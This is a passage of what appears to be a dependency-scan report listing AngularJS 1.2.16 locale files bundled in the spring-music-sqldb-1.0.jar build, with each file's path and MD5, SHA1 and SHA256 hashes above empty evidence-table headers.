spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_lt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_lt.jsMD5: c14b1e1735fe56b5b7476db0d6f4c9c9SHA1: ae3537351caef1866e9ac114a1a2d81b393990f5SHA256: 02e85bcb9626a429117ba41052133ad59b86103632435793030dd4625e3361ec
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_lv-lv.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_lv-lv.jsMD5: 851b96bad84cf32c3a382ab4c4dc9a29SHA1: 423e5dab762c58c37a3ec9aa5e8268d301d86ac1SHA256: 04151154243526789a34f4573ba0cd61461c43e20c2bc08f8b407597b316a626
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_lv.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_lv.jsMD5: 7d914954fa4facedb14a126ea2ca7359SHA1: 1c531d549afacf7d7022b85f1fde81461ce50783SHA256: 6167e3c681099bffcd4e42c2b17c727e1dc44376e6f647f15c93b7a63306add6
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ml-in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ml-in.jsMD5: 670502bc05fdcb5e5f63441938d669b3SHA1: 45b098333c1532687078d9cfc28dbf8fd7decd12SHA256: 0185eb7de7f55fbd55ffe626c1d690bdf6461ba7574f2644f88c571385c718ae
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ml.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ml.jsMD5: 6751948a95bbbf735f7b4883710c5187SHA1: dc256dd2ed3bad1515da3f1768eb81791ad97e39SHA256: a5d28d30f7561f135675df83533073e5375535fa91b6eb75931ba4df9f873bb8
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_mr-in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_mr-in.jsMD5: 505bec8f2297564968c5b2f9cab8ed92SHA1: f0344f6dcd79f77f0a9861065a215d3b8ab275aaSHA256: 28f93ba77ad2435c21ee85794ed94d16403b2de890610c64e2ec165116158eaf
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_mr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_mr.jsMD5: 44ca1499bc67f865017a6e9365ea4136SHA1: e16bbdf5ce9ed5f1b6d6dddd7526f57918101e41SHA256: 7a7932e904cc3a737f96d7148e78d35c264705aed831d89f6f05a253e59534b9
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ms-my.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ms-my.jsMD5: 3582c60fc3de819f57b7eda865986a7eSHA1: c798a9684df9b44fcfa531c25d9929e506e2e0edSHA256: e39136f976f8ca5642252dad6557c38c4f1ff935b81c0ab5418b0fccca828425
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ms.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ms.jsMD5: af9d81279156d2220a710730eec50437SHA1: e0deea43fadb8c05e542fb7424e62d2b9b1a46bdSHA256: a54bae3d90d41e8631af85d78f765ec7442d7aa68bcf475ea3bb220ebcffc3a0
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_mt-mt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_mt-mt.jsMD5: abe8b0a61ca17402f6f40cc2e9876d19SHA1: 2a005f882b307f7ed04e8476807509260df44d7cSHA256: db1433a70b9e808ce993d7a93d00c7c9998600bb38c023520fead7d30bc73b2e
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_mt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_mt.jsMD5: 3ba3b0d77f8c52456f4336d8181acc7aSHA1: 26f2524c109c761a0e5ca0d739218e84a74ad67dSHA256: 5f4575cbafd47bbbb9a24f7f889208b5bb0567ece659fa5041725027666bda49
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_nl-cw.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_nl-cw.jsMD5: 2da6f85494dd8f2d916fd1acdff21a54SHA1: d59e658a156823c9b489b1065384e4d41b0ad7d3SHA256: 79f262ecfa62bf4259e2698b87f4333bacaf01e4244284dec3490271c6bacef5
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_nl-nl.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_nl-nl.jsMD5: 1ee9a880a7710b0a485fdf30abf80399SHA1: 5e2582ab145fe7b9a98dca551e2b50e1c7210ef4SHA256: 78d3ac2c84cecfec2a40a05faba39c9a2d8c93d1a4f3fb35ab2eeddaecd0db22
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_nl-sx.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_nl-sx.jsMD5: 14d9c88c730ad7d6037b2a8702e22b71SHA1: c44ad16db80791e599d3a56575f10696aa60fbbfSHA256: 7aaf607f4ce78dd1467bb3df1eb983b3c6aae93bde8a772c7457656d400bed22
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_nl.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_nl.jsMD5: 020a83299231646f59a4e96cca91aa5dSHA1: 5b1eacfccb616e43abb5b8e24bdb6580ed00626aSHA256: 6be94740795992b4b51351c35c4a87756ec118755845febe22da197cef69d0e3
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_no.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_no.jsMD5: 81e9af58edc17301ef6ddadc108217d1SHA1: 989f1bde5ef95cf0555356d40e65eebc4f5118caSHA256: 5285501230d1b3bdc0ebe490481c50340bd37f91a6624ffde0c9675876d93484
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_or-in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_or-in.jsMD5: 2c2201d76fed460cb2754fe8126943a2SHA1: be27b8cd1224aabb5c864a80dfb41f31face03cdSHA256: f009bd4a1908fbdb14ac652f7c1b7ed3408a50609e678d78067f4d02d68a4033
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_or.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_or.jsMD5: e93a0a5a9292fb8c1132810b19712acdSHA1: c9b06afc54eae506f3636e1415bf8393a0f8be5cSHA256: ca7045a69d5e27c381fbb718d6084be9bed3bca336a4d9513b2b766b9587250c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_pl-pl.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_pl-pl.jsMD5: bd2223760e50f22e25226c2a04e0e6fcSHA1: 81d338d6c832274b1bd6fde5f61e28f36a03f89aSHA256: b978d0c229c09dc68d3c7c572ca5f2e3a79ca8d624e939c5adc7e6348d0bc4b1
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_pl.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_pl.jsMD5: e24f02bbe5cfd7251062726ffcbe8aeeSHA1: a246a4dbe4b0fe1f54084ae598348099c70bbad9SHA256: 985bfac724d8925fe37bf62f66a20a47e9ddb89ee56037dfd7d45bf54767840c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_pt-br.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_pt-br.jsMD5: 4753313faf1fc3202e324051d205de10SHA1: b5f4c69a3ebbc33d6f6fc353c2eab611ca109b74SHA256: 409a2c715bb5befbb917f93506044e55578432e500da08e1c45bddfc4ef9cbc2
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_pt-pt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_pt-pt.jsMD5: d47d0a8221a5756f4b3600baa72f05a4SHA1: ecf393370e4ef34588a651899218e08b2c0254f2SHA256: a8720ed7ba58cc1dc0cd4747e41d7d60d45541ca3b1cb560d89851e2ff027d74
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_pt.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_pt.jsMD5: 47e7c7bf78d1ee432d83dac6a70e691dSHA1: 934a3b51d9c9f3b54bdb7527c5b8f5ff6da9f7d7SHA256: 280d2502045afc3773666f197c6645b35f6241670cec0194dfb071892b8e4070
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ro-ro.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ro-ro.jsMD5: c6c85dbfda5bd0318fd6552a4577247dSHA1: 738cc856ed1408b877a62d12e6c2e4fba7b2e7f8SHA256: ab3d2e5d40532b86120ec4528cab2ceb08547597597bf7d5c2f2c79f25edc036
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ro.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ro.jsMD5: 5b0d54f89aa006f27248fc139f247034SHA1: d7c66d8548b30f212b842fd8baf8cd5833c0a031SHA256: b86b61bfa9ebe5a5fa227e386c900d2f01704b97aa92b9e6a4a8afe5a92f21ff
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ru-ru.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ru-ru.jsMD5: 204fbd85407f81f3c6125e3fbe9e476fSHA1: ef2fb44e7a58044bbd00f60ad5a8ae4dbe6eff92SHA256: b534c2c9e883e963abb17323744122a648b9df032d6255621841b9ef3cf37bf3
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ru.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ru.jsMD5: 58614a0195daaaebda6674feedbe16aaSHA1: d809ef52bd5c67fd50bd4a73c1d8355c9c7197d8SHA256: 7ef06d2a7a0a54848176e8c31bc5796cc0944b059cdadfd2641b4ce97a9c20de
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sk-sk.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sk-sk.jsMD5: 5c81269f03a3476ac1fae2f88e68f242SHA1: 7546ec981a9108d72f649ba7d10073f079c7d2e7SHA256: e61ed105d38ac665ea5a687655ddc1643ef4e48bb13c355ffd70b8cbb1106e46
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sk.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sk.jsMD5: 0fa7e8027baa0ecbe9873a6ad1779ac7SHA1: f1f102d3cb4a594893fe9abf03b546b57115ea3fSHA256: 82cab0573b4624bc3795f5a54febc7ec2d539e46520ba0191d039c83236e0398
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sl-si.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sl-si.jsMD5: c31218517f8d8ce24c8f35e9a002bd42SHA1: 8774b78f713cf50a656f2ad06a3c86fc9e81ccb0SHA256: 94838f5a413930bfc535a7e87f467b0150b43978fd8b3861b615276ab11d1355
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sl.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sl.jsMD5: a98c80c5178ead4503996d80f2b7ce58SHA1: 3ef1d229264e43d65a11d415f24b58715e826f4bSHA256: c82b53125a4fb14963fd20473fad799d488b34b3ecc5608e1983cc4649d9626d
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sq-al.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sq-al.jsMD5: fcfd6ed3ca4f3e79330fd6554fa62dffSHA1: 0a35ea7303c1fdd3566673f10b31d19e6dd57887SHA256: 44fc9c97df9dc9b1dbf7c9cf9b6e06a0154357fdf8a1785823281a1e53354c3b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sq.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sq.jsMD5: fe1bd08f4351c143197a11cf777ef047SHA1: 50473b23c9163a6d1bf1a5e9965a24e4826e886dSHA256: f7735b3c2e818235e7e3bacb136f2d4e255707c901b466ef97deb1c17d172c9c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sr-cyrl-rs.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sr-cyrl-rs.jsMD5: ca27f02ad0dd5a3a377d6a282c2435aaSHA1: 3d2150947b28081d89ed2e81f64780cde82c18dbSHA256: ed3d5108db34bbd300576636c0c7308bb8ba4465dcf34abca60a37fa6ab7c3ba
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sr-latn-rs.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sr-latn-rs.jsMD5: 6155027570c0aef2af921074e25d1b70SHA1: b3ab264c6e56172e0c78c38d29c7574910fffc8dSHA256: c8f9082c5f8dc930cd3203f4db2943c08497b9f88ab835e5b33ca38e23e0cba5
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sr.jsMD5: 5b60a516cb6419b79578ac3079e0405aSHA1: 4dc6c1f4680e67e52785e60abfb87b9f13efc704SHA256: b26f38a6bb9ea651a26ef6def3cf9047d1773f79f68fdd2d58c3ab33df6031de
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sv-se.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sv-se.jsMD5: 90e0f706eef17bb039068768bffe4651SHA1: ea107446b3ebd4160b914e79db0e45ded220a0d8SHA256: c4e6ff46cb19a740c9725d086653d48d8c3adadebcb99d5598224aa89d0ff958
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sv.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sv.jsMD5: 09b88cc023bc9925a4463cfc4840425aSHA1: 65652b1914ac9fa5d1bfa5da665b03935cc90931SHA256: 424e7d8b85fd18a2f91362b4928ec5d6db005d6fd5927b909ebecf15518c8037
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sw-tz.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sw-tz.jsMD5: c1c1ed12491f2f1da1ad818ea04e96faSHA1: d9c7fb89d8a826d9a8a01eb51a4e4d8a7eb5b29cSHA256: d7a69eccb397f7c20d33d4baa38a809d799a15f48a7910a08c646f49d1315d28
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_sw.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_sw.jsMD5: 4765ade7f90d1bdb144eff9d32a4f9ecSHA1: d58de6410c7361850fa95220a4396b13e4b2f0caSHA256: ba97f8edb94a297ffa8029410e2242246889e97a94b1f185532559a391357704
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ta-in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ta-in.jsMD5: 8a757a3191571e9fa12331d75be767d9SHA1: 1f50ecffd24b1be3bce033f34feae86db133cbffSHA256: 2502e202e8e973193e75b8a7d4867492dc7b4392380c8d81dc2982bbc8745f4c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ta.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ta.jsMD5: 47f7c724ce78055ac8de2d8a5a06f423SHA1: c722c68e069533a4b03da931fa51f523ac0284b6SHA256: c53e7bfaa7d172fbbd148000e17d5b5372af0c4098287421151540382975eabd
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_te-in.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_te-in.jsMD5: cf4b3de1982d082dc1e2cdc073a8f33aSHA1: 9312d4c2b20e5a61cea250d418d1d4f280fbbd14SHA256: 477cac38b6fe9ff970b3d70e22c36f958344c5df002df6ef3c074150d26324bf
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_te.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_te.jsMD5: a76a1c600fffab923aef7bbb4bb4009fSHA1: e56c7ec4a65140e9b8ae6036957ec8911d185c34SHA256: a2e6eff19362e978a4372b42c0ae5cc4d60245533f833644a4e8d3c6b4bd4d93
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_th-th.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_th-th.jsMD5: 2ecbf2bfa7e627b603d19fd312174c84SHA1: a11308f3067a386cd9a13809d128c68b30dd39c2SHA256: 802741a779cd0aff552ffa5fdf0a36421e9fabc4f91b24fe7299ad66104ed1f4
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_th.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_th.jsMD5: e272aab515b1b28805abd6ab1e4673acSHA1: 263188b552845ccd344d00ef0cd402285f6a5d23SHA256: 559664db3ca6601da42cd29075949b574a465576e61009b0d9919e07a5b5581c
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_tl.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_tl.jsMD5: 866913ac10a2f7c93f1441e96fe5daf3SHA1: 9bcd5aa2a9f69a9eab6e5452c3c23db7a49a1e42SHA256: 30eb2a411bac01758fd44e914bfda28ffbad9d1ab283040c23f0d8396bd7e9a7
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_tr-tr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_tr-tr.jsMD5: b6ab57581c3fdc02072c17738afaee03SHA1: 1d41125a5e6db3a0bc45ff0065ed43aa8dada298SHA256: 497ce2ade6c1152e6aecc9d1db23befb68e57dea84da69be67dadf8be2932542
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_tr.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_tr.jsMD5: 268c1518114b27fff577af3aa01324b8SHA1: 4ebaf1f347e5900e245754e4423d5b6690a9e7adSHA256: 13c25473a5a5afc86d5e5e48f7c851c257be3ac796c05b0079b2e470bc0697f6
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_uk-ua.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_uk-ua.jsMD5: 897d2f102b7fbf7285b7f4cbc0367042SHA1: 94bdecacdcfa2441331f1ecec855449ea5b33dc8SHA256: 375fd350009d22b24abfe5a1c914609d130830203311544e3fb50fa685e8bd4b
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_uk.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_uk.jsMD5: f9fe1870529eef262e418a28470470d6SHA1: 9f93d7b075b3322ad2c75ca277fcde561f27678cSHA256: 26da53e4f4b5390bc51d7791ac76d1d801189cc921b8bccb451407e1d6ba9901
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ur-pk.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ur-pk.jsMD5: 8178ef57143cecdd09196b93e4272d5bSHA1: 812170caf187606cc18d0135b3304beef6f31c00SHA256: 8341e8fed9ac473597948c47d9d77e14a7307f8e8c8e773171d5ccde26d3e2c8
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_ur.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_ur.jsMD5: dd5469ccf533f57126152f3511176d15SHA1: cc83abbb2c7a202453b796bea6b4027a7a4d1226SHA256: 97bdb50a2729f94a43a79afd2960ee67fca26cfe6ead6d5ce4d904f489348378
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_vi-vn.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_vi-vn.jsMD5: 4ac65ba73233d5e04682a7567acc6dd4SHA1: d611a744a28baccdfd3ec09f77eb8df20fbab3b0SHA256: 541cd9370b96650cd864792c1befdf3b2c220904e3efd13a9528da83c9af95d3
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_vi.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_vi.jsMD5: 18b4f391e6f047d975355e4ab8ff8756SHA1: 78afbde12b2e3004e7e4895e82e20f5d03c5f08fSHA256: b3f86cde19cfb7ead821e700303a067852c3793e05203cf184274c4c6bed5d79
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: angularjs-1.2.16.jar: angular-locale_zh-cn.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/angularjs-1.2.16.jar/META-INF/resources/webjars/angularjs/1.2.16/i18n/angular-locale_zh-cn.jsMD5: c4a7a552119cd0b6fa2913e96dc2e59bSHA1: 4c875fd240e3db268dff40fbeff2a6fc5d57fd8fSHA256: 5144e0838f94636a9b645fbd20dc543b082555dd2dfafdb2c0bd1fbe008c173b
Evidence Type Source Name Value Confidence
